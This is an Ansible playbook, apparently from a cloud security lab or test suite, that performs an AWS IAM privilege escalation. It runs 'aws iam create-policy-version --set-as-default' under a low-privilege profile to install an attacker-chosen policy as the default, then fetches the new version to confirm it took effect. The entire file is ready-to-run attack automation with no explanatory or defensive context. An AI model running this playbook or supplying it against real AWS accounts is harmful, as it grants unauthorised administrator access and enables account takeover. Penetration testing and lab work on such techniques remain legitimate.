- hosts: localhost
  gather_facts: True
  vars_files: "../group_vars/vars.yml"
  vars:
    - playbook_name: 'privesc1-CreatePolicyVersion.yml'
  tasks:
    - name: Run CreatePolicyVersion Shadow admin Priv Esc 
      shell: "aws iam create-policy-version --policy-arn {{ policy_arn_privesc1 }} --policy-document file://{{ privesc1_json_policy }} --set-as-default --profile privesc1"
      register: result
      ignore_errors: yes

    - debug:
        msg: '{{ result.stdout }}'

    - set_fact: VersionId='{{ result.stdout | from_json | json_query("PolicyVersion") | json_query("VersionId") }}'

    - debug:
        msg: '{{ VersionId }}'

    - name: 
      shell: "aws iam get-policy-version --policy-arn {{ policy_arn_privesc1 }} --version-id '{{ VersionId }}'"
      register: result2
      ignore_errors: yes

    - debug:
        msg: '{{ result2.stdout }}'